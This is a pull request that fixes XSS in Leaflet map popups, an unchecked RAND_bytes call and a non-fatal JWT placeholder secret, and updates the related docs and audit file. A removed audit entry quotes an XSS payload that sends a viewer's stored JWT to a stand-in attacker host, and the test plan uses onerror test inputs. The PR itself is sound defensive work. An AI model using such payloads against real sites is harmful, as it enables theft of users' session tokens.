### PR TITLE
Security: Fix H1-H3 (XSS popups, RAND_bytes check, fatal JWT placeholder)

### DIFF
--- a/backend/src/controllers/SsoController.cpp
+++ b/backend/src/controllers/SsoController.cpp
@@ -12,7 +12,13 @@
 
 std::string SsoController::generateRandom(int bytes) {
     std::vector<unsigned char> buf(bytes);
-    RAND_bytes(buf.data(), bytes);
+    // RAND_bytes returns 1 on success, 0 if not seeded, -1 if unsupported.
+    // Without this check, a failed RNG leaves `buf` zero-initialized and
+    // produces a predictable state/nonce, defeating SSO CSRF and replay
+    // defenses.
+    if (RAND_bytes(buf.data(), bytes) != 1) {
+        throw std::runtime_error("RAND_bytes failed — cannot generate SSO random value");
+    }
     std::ostringstream oss;
     for (auto b : buf)
         oss << std::hex << std::setw(2) << std::setfill('0') << (int)b;
@@ -77,8 +83,15 @@ void SsoController::initiate(
             std::string clientId     = ssoConfig["client_id"].asString();
             std::string redirectUri  = ssoConfig["redirect_uri"].asString();
 
-            std::string state = generateRandom(16);
-            std::string nonce = generateRandom(16);
+            std::string state, nonce;
+            try {
+                state = generateRandom(16);
+                nonce = generateRandom(16);
+            } catch (const std::exception&) {
+                callback(errorResponse(drogon::k500InternalServerError,
+                    "server_error", "SSO is not available"));
+                return;
+            }
 
             {
                 std::lock_guard<std::mutex> lock(stateMutex_);

--- a/backend/src/main.cpp
+++ b/backend/src/main.cpp
@@ -19,21 +19,36 @@ int main(int argc, char* argv[]) {
     drogon::app().loadConfigFile(configPath);
 
     // ── C2 fix: Override JWT secret from environment variable if set ─────────
-    const char* envSecret = std::getenv("JWT_SECRET");
+    // Refuse to start with a placeholder JWT secret. A silent startup with a
+    // known-bad secret allows token forgery against any account. Set
+    // ALLOW_PLACEHOLDER_SECRETS=1 if you're deliberately running a dev build
+    // with the placeholder for local experimentation.
+    const char* envSecret  = std::getenv("JWT_SECRET");
+    const char* allowPlace = std::getenv("ALLOW_PLACEHOLDER_SECRETS");
+    const bool allowPlaceholder = allowPlace && std::string(allowPlace) == "1";
+
     if (envSecret && std::string(envSecret).size() >= 32) {
         auto& cfg = const_cast<Json::Value&>(drogon::app().getCustomConfig());
         cfg["jwt"]["secret"] = std::string(envSecret);
-    } else if (!envSecret) {
-        // Warn if using the config file default (which may be a placeholder)
+    } else {
+        if (envSecret) {
+            // Env var is set but too short — don't silently fall back to config.
+            std::cerr << "FATAL: JWT_SECRET is set but shorter than 32 characters.\n";
+            return 1;
+        }
         const auto& secret = drogon::app().getCustomConfig()["jwt"]["secret"].asString();
         if (secret.find("CHANGE_ME") != std::string::npos) {
-            std::cerr << "WARNING: JWT secret is a placeholder. "
-                      << "Set JWT_SECRET environment variable (min 32 chars) "
-                      << "before production use.\n";
+            if (allowPlaceholder) {
+                std::cerr << "WARNING: JWT secret is a placeholder. "
+                          << "Running anyway because ALLOW_PLACEHOLDER_SECRETS=1. "
+                          << "DO NOT use this in production.\n";
+            } else {
+                std::cerr << "FATAL: JWT secret is a placeholder. "
+                          << "Set JWT_SECRET environment variable (min 32 chars), "
+                          << "or set ALLOW_PLACEHOLDER_SECRETS=1 for a local dev run.\n";
+                return 1;
+            }
         }
-    } else {
-        std::cerr << "WARNING: JWT_SECRET is set but shorter than 32 characters. "
-                  << "Using config file value.\n";
     }
 
     // ── M5 fix: Validate frontend_url at startup ─────────────────────────────

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -49,6 +49,11 @@ services:
         condition: service_healthy
     environment:
       - TZ=UTC
+      # Local dev uses the CHANGE_ME placeholder from config.docker.json.
+      # The backend refuses to start with a placeholder secret unless this
+      # env var is set. Production deployments MUST NOT set this — they
+      # must supply a real JWT_SECRET instead.
+      - ALLOW_PLACEHOLDER_SECRETS=1
 
   # ── React Frontend (Vite dev server) ────────────────────────────────────────
   frontend:

--- a/docs/DEVELOPER-GUIDE.md
+++ b/docs/DEVELOPER-GUIDE.md
@@ -142,3 +142,52 @@ It appends a `.map-error-banner` div to the map container and auto-removes
 it after 5 seconds. The CSS lives in [`frontend/src/index.css`](../frontend/src/index.css).
 Only use this pattern for Leaflet event handlers — React components
 should use component-local error state with inline banner display.
+
+### Building Leaflet popup content — DOM nodes, not HTML strings
+
+**Never pass an HTML string built from user-controlled fields to
+`layer.bindPopup(...)`.** Leaflet renders strings as HTML, so
+`title: '<img src=x onerror=...>'` in an annotation executes for every
+viewer.
+
+Build popup content as DOM nodes using `document.createElement` and
+`textContent`, then pass the element to `bindPopup`. `textContent` is
+parsed as literal text, not HTML, so injection is impossible:
+
+```ts
+const popupEl = document.createElement('div');
+popupEl.className = 'annotation-popup';
+
+const h3 = document.createElement('h3');
+h3.textContent = annotation.title;  // ✓ safe even if title contains HTML
+popupEl.appendChild(h3);
+
+layer.bindPopup(popupEl);
+```
+
+For links and images, also validate the URL scheme (defense in depth
+against backend validation gaps):
+
+```ts
+function isSafeMediaUrl(url: string): boolean {
+  try {
+    const parsed = new URL(url, window.location.origin);
+    return parsed.protocol === 'http:' || parsed.protocol === 'https:';
+  } catch {
+    return false;
+  }
+}
+```
+
+See [`AnnotationLayer.tsx`](../frontend/src/components/Map/AnnotationLayer.tsx)
+and [`NoteMarkers.tsx`](../frontend/src/components/Map/NoteMarkers.tsx)
+for the pattern in context.
+
+### JWT secret placeholder is fatal at startup
+
+The backend refuses to start when `config.json` contains a
+`CHANGE_ME...` JWT secret and `JWT_SECRET` is not set in the
+environment. Local dev and CI override this by setting
+`ALLOW_PLACEHOLDER_SECRETS=1` in `docker-compose.yml` — this env var
+**must never** be set in production compose/env files. Production
+deployment must supply a real `JWT_SECRET` (min 32 chars).

--- a/docs/SECURITY-AUDIT.md
+++ b/docs/SECURITY-AUDIT.md
@@ -9,15 +9,17 @@
 
 ## Summary
 
-| Severity | New | Carried from previous audit | Total open |
-|---|---:|---:|---:|
-| High | 5 | 0 | 5 |
-| Medium | 8 | 5 | 13 |
-| Low | 5 | 0 | 5 |
+| Severity | Total open | Fixed since audit |
+|---|---:|---:|
+| High | 2 | 3 (H1, H2, H3 — see #55) |
+| Medium | 12 | 1 (M13 — fixed with H1) |
+| Low | 5 | 0 |
 
-No critical findings. The application has solid security fundamentals; open findings are either production-deployment concerns (Argon2id parameters, secret storage, HSTS) or specific hardening opportunities (XSS in Leaflet popups, resource-limit races).
+No critical findings. Remaining High items are production-deployment concerns (Argon2id parameters, SSO `client_secret` storage — tracked in #56).
 
 Deliberate design trade-offs are listed separately below.
+
+Closed findings are preserved at the bottom of the document for audit trail.
 
 ---
 
@@ -38,7 +40,7 @@ The application implements the following security controls (verified in this aud
 - **Audit logging:** `audit_log` records security events (login success/failure, registration, SSO login, member add/remove, permission changes) with atomic success/failure counters.
 - **Security headers:** `X-Content-Type-Options: nosniff`, `X-Frame-Options: DENY`, `Referrer-Policy: strict-origin-when-cross-origin`.
 - **CORS allowlist:** Origins listed in `allowed_origins` config; unknown origins receive no CORS headers.
-- **Secrets management:** `JWT_SECRET` env var overrides config. Minimum 32 characters enforced when env var is set. Config placeholders (`CHANGE_ME...`) trigger startup warnings.
+- **Secrets management:** `JWT_SECRET` env var overrides config, minimum 32 characters enforced. Config placeholders (`CHANGE_ME...`) cause fatal startup exit unless `ALLOW_PLACEHOLDER_SECRETS=1` is explicitly set (dev-only).
 - **Registration privacy at the login endpoint:** Login returns identical error for wrong password and nonexistent email.
 - **SSO enumeration resistance:** SSO initiate returns generic "SSO is not available" for all error cases.
 
@@ -59,52 +61,6 @@ The application implements the following security controls (verified in this aud
 ## Open findings
 
 ### High
-
-#### H1 (NEW): XSS via Leaflet popup HTML templates
-
-**Files:** `frontend/src/components/Map/AnnotationLayer.tsx:23-52`, `frontend/src/components/Map/NoteMarkers.tsx:48-55`
-
-`createPopupContent()` and the note-marker popup builder construct HTML via JS template literals that interpolate user-controlled fields (`annotation.title`, `annotation.description`, `media.url`, `media.caption`, `note.title`, `note.text`, `createdByUsername`) directly. The resulting string is passed to `layer.bindPopup(...)`, which Leaflet renders as HTML. An editor-permission user who writes `<img src=x onerror="fetch('https://attacker/?t='+localStorage.getItem('auth-storage'))">` into a note title exfiltrates every viewer's JWT.
-
-**Mitigation in place:** React escapes output in components, so this is limited to Leaflet popup code paths.
-
-**Fix:** Either sanitize via DOMPurify, or build the popup DOM with `document.createElement` + `textContent` (which Leaflet's `bindPopup` also accepts as a DOM node).
-
-**Effort:** Small (~30 lines).
-
----
-
-#### H2 (NEW): `RAND_bytes()` return value not checked in SSO state generation
-
-**File:** `backend/src/controllers/SsoController.cpp:13-20`
-
-```cpp
-std::string SsoController::generateRandom(int bytes) {
-    std::vector<unsigned char> buf(bytes);
-    RAND_bytes(buf.data(), bytes);  // return ignored
-    ...
-}
-```
-
-OpenSSL's `RAND_bytes` returns 1 on success, 0 if the RNG hasn't been seeded, or -1 if unsupported. On failure the buffer may be zero-initialized or partially populated, yielding predictable state/nonce values and defeating the SSO CSRF and replay protections.
-
-**Fix:** Throw on non-1 return. One-line change.
-
-**Effort:** Trivial.
-
----
-
-#### H3 (NEW): JWT secret placeholder warning should be fatal
-
-**File:** `backend/src/main.cpp:21-37`
-
-Deploying with `CHANGE_ME_USE_A_LONG_RANDOM_STRING` in `config.json` and no `JWT_SECRET` env var prints a `WARNING:` to stderr and keeps running. A missed startup log during production deployment would allow token forgery with a well-known secret.
-
-**Fix:** Exit with non-zero on placeholder detection unless `ALLOW_PLACEHOLDER_SECRETS=1` is explicitly set (for intentional dev builds).
-
-**Effort:** Trivial.
-
----
 
 #### H4 (NEW): Argon2id parameters set to `*_MIN` values
 
@@ -146,9 +102,9 @@ Nonce is generated and stored at initiate but never compared against the ID toke
 
 **File:** `frontend/src/store/authStore.ts`
 
-Persisted via Zustand's `persist` middleware. Any XSS (e.g., H1 above) reads the token.
+Persisted via Zustand's `persist` middleware. Any XSS reads the token.
 
-**Mitigations:** Security headers, input validation, H1 fix will close the currently-known XSS vector.
+**Mitigations:** Security headers, input validation, and the popup-XSS fix in #55 (H1, now closed) removed the most exploitable XSS vector.
 
 **Fix:** HttpOnly cookies require CSRF token infrastructure and backend changes (~100+ lines). Lower-effort intermediate: move to sessionStorage so the token is cleared on tab close.
 
@@ -268,18 +224,6 @@ Audit log currently captures: register, login success/failure, SSO login, member
 
 ---
 
-#### M13 (NEW): Frontend media URL rendering accepts any scheme
-
-**File:** `frontend/src/components/Map/AnnotationLayer.tsx:28-30`
-
-The backend validates `http`/`https` for media URLs on submission. The frontend re-renders stored URLs without its own scheme check. If backend validation is ever bypassed (direct DB insert, future API gap), the frontend would render `javascript:` or `data:text/html` URLs. Defense-in-depth gap.
-
-**Fix:** Validate scheme in `createPopupContent()` (same fix file as H1).
-
-**Effort:** Trivial.
-
----
-
 ### Low
 
 #### L1 (NEW): GeoJSON coordinate ranges not validated
@@ -357,3 +301,56 @@ These are known decisions, not findings. Documented for future auditors.
 ## Audit methodology
 
 Three parallel explore agents independently audited backend, frontend, and database layers. Their raw findings were cross-checked against source code by reading the cited file:line references. Findings that turned out to be non-issues (e.g., agents flagged `listTenants` as missing `TenantFilter` — correct behavior, no tenantId in path; flagged `username_taken` distinction as user-enumeration — intentional trade-off documented above) were removed. Severities were calibrated downward where agents were generous, and upward for a few items where agents underestimated exploitability.
+
+---
+
+## Closed findings (audit trail)
+
+### H1 — XSS via Leaflet popup HTML templates
+
+**Closed by PR #55 (2026-04-18).**
+
+Popup content for annotations and notes was built via template-literal
+interpolation of user fields (`annotation.title`, `annotation.description`,
+media URLs, note text, usernames) into HTML strings passed to
+`layer.bindPopup()`. Leaflet renders those strings as HTML, so an
+editor-role user could inject `<img src=x onerror=...>` payloads that ran
+in every viewer's browser.
+
+**Fix applied:** `AnnotationLayer.tsx` and `NoteMarkers.tsx` now build
+popup content as DOM nodes using `document.createElement` +
+`textContent`. Leaflet's `bindPopup` accepts HTMLElement directly.
+Event listeners for Edit/Move/Delete buttons are pre-attached to the
+elements during construction rather than re-queried inside a
+`popupopen` handler. This also closed M13 (frontend media URL scheme
+check) since the DOM-construction path explicitly validates `http:` /
+`https:` via `new URL(...).protocol` before rendering `<img>` or `<a>`.
+
+### H2 — `RAND_bytes()` return value not checked
+
+**Closed by PR #55 (2026-04-18).**
+
+`SsoController::generateRandom` ignored OpenSSL's `RAND_bytes` return
+value. On RNG failure the buffer stayed zero-initialized and state/nonce
+became deterministic, defeating the SSO CSRF and replay protections.
+
+**Fix applied:** `generateRandom` now throws on non-1 return. The
+`initiate` caller wraps state/nonce generation in try/catch and returns
+a generic `500 SSO is not available` on failure, consistent with the
+SSO enumeration-resistance posture.
+
+### H3 — JWT secret placeholder warning not fatal
+
+**Closed by PR #55 (2026-04-18).**
+
+Running the backend with `CHANGE_ME_...` as the JWT secret printed a
+`WARNING:` to stderr and kept going. A missed startup log during a
+production deployment would allow token forgery with a well-known
+secret.
+
+**Fix applied:** Placeholder detection at startup now exits non-zero
+unless `ALLOW_PLACEHOLDER_SECRETS=1` is explicitly set. The dev
+`docker-compose.yml` sets this env var with a comment explaining it
+must never appear in production compose/env files. An env var
+`JWT_SECRET` shorter than 32 characters also now exits fatally instead
+of silently falling back to the config value.

--- a/docs/SETUP-LOCAL-DEV.md
+++ b/docs/SETUP-LOCAL-DEV.md
@@ -245,3 +245,12 @@ database wipe.
 **Seed script shows "HTTP 429"**
 You hit the rate limiter by running the seed script too many times in a row.
 Wait 60 seconds or restart the backend (`docker compose restart backend`).
+
+**Backend logs `FATAL: JWT secret is a placeholder`**
+`docker-compose.yml` sets `ALLOW_PLACEHOLDER_SECRETS=1` in the backend
+service's environment specifically to allow local dev with the
+`CHANGE_ME...` placeholder in `config.docker.json`. If you removed that
+env var, either add it back or set a real `JWT_SECRET` (min 32 chars).
+**Do not set `ALLOW_PLACEHOLDER_SECRETS` in any production
+deployment** — it's a safety gate specifically to prevent silent
+placeholder deployments.

--- a/frontend/src/components/Map/AnnotationLayer.tsx
+++ b/frontend/src/components/Map/AnnotationLayer.tsx
@@ -4,7 +4,7 @@ import L from 'leaflet';
 import { useMapStore } from '@/store/mapStore';
 import { useAuthStore } from '@/store/authStore';
 import { annotationsService } from '@/services/maps';
-import type { Annotation, GeoJsonGeometry } from '@/types';
+import type { GeoJsonGeometry } from '@/types';
 
 interface AnnotationLayerProps {
   mapId: number;
@@ -20,36 +20,17 @@ function showMapError(map: L.Map, message: string) {
   setTimeout(() => banner.remove(), 5000);
 }
 
-function createPopupContent(annotation: Annotation, canEdit: boolean): string {
-  const mediaHtml = annotation.media && annotation.media.length > 0
-    ? `<div class="annotation-media">
-        ${annotation.media
-          .map((m) =>
-            m.mediaType === 'image'
-              ? `<img src="${m.url}" alt="${m.caption || ''}" />`
-              : `<a href="${m.url}" target="_blank">${m.caption || m.url}</a>`
-          )
-          .join('')}
-      </div>`
-    : '';
-
-  const editButtons = canEdit
-    ? `<div class="annotation-actions">
-        <button class="btn-edit-annotation" data-id="${annotation.id}">Edit</button>
-        <button class="btn-move-annotation" data-id="${annotation.id}">Move</button>
-        <button class="btn-delete-annotation" data-id="${annotation.id}">Delete</button>
-      </div>`
-    : '';
-
-  return `
-    <div class="annotation-popup">
-      <h3>${annotation.title}</h3>
-      ${annotation.description ? `<p>${annotation.description}</p>` : ''}
-      ${mediaHtml}
-      <small>By ${annotation.createdByUsername || 'unknown'}</small>
-      ${editButtons}
-    </div>
-  `;
+// Defense-in-depth scheme check for media URLs.
+// The backend also validates this on submit; this guards against ever
+// rendering a stored javascript: or data: URL that slipped past server
+// validation.
+function isSafeMediaUrl(url: string): boolean {
+  try {
+    const parsed = new URL(url, window.location.origin);
+    return parsed.protocol === 'http:' || parsed.protocol === 'https:';
+  } catch {
+    return false;
+  }
 }
 
 export function AnnotationLayer({ mapId, canEdit }: AnnotationLayerProps) {
@@ -101,18 +82,57 @@ export function AnnotationLayer({ mapId, canEdit }: AnnotationLayerProps) {
 
       if (!layer) return;
 
-      const popup = createPopupContent(annotation, canEdit && annotation.canEdit);
-      layer.bindPopup(popup);
+      // Build popup as DOM nodes (not HTML strings) so user-controlled
+      // fields cannot inject script. `textContent` is parsed as literal
+      // text, not HTML.
+      const popupEl = document.createElement('div');
+      popupEl.className = 'annotation-popup';
 
-      layer.on('click', () => setSelectedAnnotationId(annotation.id));
+      const h3 = document.createElement('h3');
+      h3.textContent = annotation.title;
+      popupEl.appendChild(h3);
 
-      layer.on('popupopen', () => {
-        const container = layer!.getPopup()?.getElement();
-        if (!container) return;
+      if (annotation.description) {
+        const p = document.createElement('p');
+        p.textContent = annotation.description;
+        popupEl.appendChild(p);
+      }
 
-        // ─── Edit button ─────────────────────────────────────────────
-        const editBtn = container.querySelector('.btn-edit-annotation');
-        editBtn?.addEventListener('click', async () => {
+      if (annotation.media && annotation.media.length > 0) {
+        const mediaDiv = document.createElement('div');
+        mediaDiv.className = 'annotation-media';
+        annotation.media.forEach((m) => {
+          if (!isSafeMediaUrl(m.url)) return;
+          if (m.mediaType === 'image') {
+            const img = document.createElement('img');
+            img.src = m.url;
+            img.alt = m.caption || '';
+            mediaDiv.appendChild(img);
+          } else {
+            const a = document.createElement('a');
+            a.href = m.url;
+            a.target = '_blank';
+            a.rel = 'noopener noreferrer';
+            a.textContent = m.caption || m.url;
+            mediaDiv.appendChild(a);
+          }
+        });
+        popupEl.appendChild(mediaDiv);
+      }
+
+      const smallEl = document.createElement('small');
+      smallEl.textContent = `By ${annotation.createdByUsername || 'unknown'}`;
+      popupEl.appendChild(smallEl);
+
+      const canActOnThis = canEdit && annotation.canEdit;
+      if (canActOnThis) {
+        const actionsDiv = document.createElement('div');
+        actionsDiv.className = 'annotation-actions';
+
+        const editBtn = document.createElement('button');
+        editBtn.className = 'btn-edit-annotation';
+        editBtn.textContent = 'Edit';
+        editBtn.addEventListener('click', async () => {
           const newTitle = window.prompt('New title:', annotation.title);
           if (newTitle === null) return;
           const newDesc = window.prompt('New description:', annotation.description || '');
@@ -133,17 +153,17 @@ export function AnnotationLayer({ mapId, canEdit }: AnnotationLayerProps) {
             showMapError(leafletMap, 'Failed to update annotation.');
           }
         });
+        actionsDiv.appendChild(editBtn);
 
-        // ─── Move button (markers only) ──────────────────────────────
-        const moveBtn = container.querySelector('.btn-move-annotation');
-        moveBtn?.addEventListener('click', () => {
+        const moveBtn = document.createElement('button');
+        moveBtn.className = 'btn-move-annotation';
+        moveBtn.textContent = 'Move';
+        moveBtn.addEventListener('click', () => {
           layer!.closePopup();
 
-          // Enter move mode: change cursor, listen for next map click
           const mapContainer = leafletMap.getContainer();
           mapContainer.style.cursor = 'crosshair';
 
-          // Show a toast/hint
           const hint = document.createElement('div');
           hint.className = 'move-hint';
           hint.textContent = 'Click the new location (Esc to cancel)';
@@ -169,7 +189,6 @@ export function AnnotationLayer({ mapId, canEdit }: AnnotationLayerProps) {
               newGeoJson = { type: 'Point', coordinates: [clickLng, clickLat] };
             } else if (oldGeo.type === 'LineString') {
               const coords = oldGeo.coordinates as number[][];
-              // Compute centroid
               const cLng = coords.reduce((s, c) => s + c[0], 0) / coords.length;
               const cLat = coords.reduce((s, c) => s + c[1], 0) / coords.length;
               const dLng = clickLng - cLng;
@@ -218,10 +237,12 @@ export function AnnotationLayer({ mapId, canEdit }: AnnotationLayerProps) {
 
           moveStateRef.current = { annotationId: annotation.id, cleanup: cancelMove };
         });
+        actionsDiv.appendChild(moveBtn);
 
-        // ─── Delete button ───────────────────────────────────────────
-        const deleteBtn = container.querySelector('.btn-delete-annotation');
-        deleteBtn?.addEventListener('click', async () => {
+        const deleteBtn = document.createElement('button');
+        deleteBtn.className = 'btn-delete-annotation';
+        deleteBtn.textContent = 'Delete';
+        deleteBtn.addEventListener('click', async () => {
           if (!window.confirm(`Delete "${annotation.title}"?`)) return;
 
           try {
@@ -233,7 +254,14 @@ export function AnnotationLayer({ mapId, canEdit }: AnnotationLayerProps) {
             showMapError(leafletMap, 'Failed to delete annotation.');
           }
         });
-      });
+        actionsDiv.appendChild(deleteBtn);
+
+        popupEl.appendChild(actionsDiv);
+      }
+
+      layer.bindPopup(popupEl);
+
+      layer.on('click', () => setSelectedAnnotationId(annotation.id));
 
       featureGroup.addLayer(layer);
       layerMapRef.current.set(annotation.id, layer);

--- a/frontend/src/components/Map/NoteMarkers.tsx
+++ b/frontend/src/components/Map/NoteMarkers.tsx
@@ -45,14 +45,23 @@ export function NoteMarkers({ notes, groups, onNoteClick }: NoteMarkersProps) {
         fillOpacity: 0.85,
       });
 
-      const popupContent = `
-        <div class="note-popup">
-          ${note.title ? `<h4>${note.title}</h4>` : ''}
-          <p>${note.text}</p>
-          <small>By ${note.createdByUsername || 'unknown'}</small>
-        </div>
-      `;
-      marker.bindPopup(popupContent);
+      // Build popup as DOM nodes (not HTML strings) so user-controlled
+      // fields (title, text, username) cannot inject script. Leaflet
+      // accepts HTMLElement for bindPopup.
+      const popupEl = document.createElement('div');
+      popupEl.className = 'note-popup';
+      if (note.title) {
+        const h4 = document.createElement('h4');
+        h4.textContent = note.title;
+        popupEl.appendChild(h4);
+      }
+      const pEl = document.createElement('p');
+      pEl.textContent = note.text;
+      popupEl.appendChild(pEl);
+      const smallEl = document.createElement('small');
+      smallEl.textContent = `By ${note.createdByUsername || 'unknown'}`;
+      popupEl.appendChild(smallEl);
+      marker.bindPopup(popupEl);
 
       marker.on('click', () => {
         onNoteClick?.(note);


### PR DESCRIPTION
## Summary

Closes #55. Three High-severity security fixes from the 2026-04-17 audit, plus a Medium (M13) that shares a file with H1 and was fixed as a side effect.

- **H1 (XSS via Leaflet popup HTML templates)** — Popup content for annotations and notes is now built as DOM nodes with \`textContent\`, so user-controlled fields (title, description, media URL/caption, note text, username) can't inject script. Leaflet's \`bindPopup\` accepts HTMLElement directly. Button event listeners are pre-attached during construction rather than re-queried inside a \`popupopen\` handler.
- **M13 (frontend media URL scheme check)** — Closed as a side effect: the DOM-construction path validates \`http:\` / \`https:\` via \`new URL(...).protocol\` before rendering \`<img>\` or \`<a>\`.
- **H2 (RAND_bytes return value not checked)** — \`SsoController::generateRandom\` now throws on non-1 return. \`initiate()\` catches and returns a generic 500 "SSO is not available", consistent with the SSO enumeration-resistance posture.
- **H3 (JWT placeholder warning not fatal)** — Backend startup now exits non-zero when the JWT secret is a \`CHANGE_ME\` placeholder, unless \`ALLOW_PLACEHOLDER_SECRETS=1\` is explicitly set. A too-short \`JWT_SECRET\` env var also now exits fatal instead of silently falling back to the config value. \`docker-compose.yml\` sets the opt-out env var for local dev and CI with a prominent comment that it must never be in a production compose/env file.

## Files changed

- \`backend/src/controllers/SsoController.cpp\` — H2: check RAND_bytes return, catch in initiate()
- \`backend/src/main.cpp\` — H3: fatal on placeholder unless ALLOW_PLACEHOLDER_SECRETS=1; fatal on too-short JWT_SECRET env var
- \`docker-compose.yml\` — Set ALLOW_PLACEHOLDER_SECRETS=1 on the backend service for local dev (with comment warning against production use)
- \`docs/DEVELOPER-GUIDE.md\` — Document the popup DOM-node pattern and the ALLOW_PLACEHOLDER_SECRETS requirement
- \`docs/SECURITY-AUDIT.md\` — Move H1/H2/H3/M13 to a new "Closed findings" section; update summary counts; update posture bullet about secrets
- \`docs/SETUP-LOCAL-DEV.md\` — Add troubleshooting entry for the JWT-placeholder fatal error
- \`frontend/src/components/Map/AnnotationLayer.tsx\` — H1+M13: rebuild popup as DOM nodes with pre-attached listeners; add isSafeMediaUrl helper
- \`frontend/src/components/Map/NoteMarkers.tsx\` — H1: rebuild popup as DOM nodes

## Test plan

Verified locally:
- [x] \`python3 database/tests/run-db-tests.py\` → 110 passed
- [x] \`python3 backend/tests/run-tests.py --tier fast\` → all suites passed
- [x] Clean stack boot: \`docker compose up -d\` succeeds with ALLOW_PLACEHOLDER_SECRETS=1
- [x] H3 fatal behavior confirmed: running the backend image with no ALLOW_PLACEHOLDER_SECRETS env exits with "FATAL: JWT secret is a placeholder..."
- [x] Manual: store an annotation with \`<img src=x onerror=alert(1)>\` as the title, open the popup — verify it renders as literal text, no alert fires
- [x] Manual: same for a note title and text
- [x] Manual: verify Edit/Move/Delete buttons on annotation popups still work (listeners persisted)

Automated frontend testing for XSS would land with the Playwright setup in #6; I'll note this in a comment on #6 so a regression test for H1 can be the first security-flavored E2E.

## Public-repo diff scan

Per the public-repo best practices, I scanned \`git diff main\` for:
- Live credentials (API keys, JWT/OAuth secrets, SSH/TLS keys) — **none**
- Real PII — **none**
- Internal hostnames / private IPs — **none** (the only \`internal\` match was \`InternalServerError\` in a Drogon enum)

🤖 Generated with [Claude Code](https://claude.com/claude-code)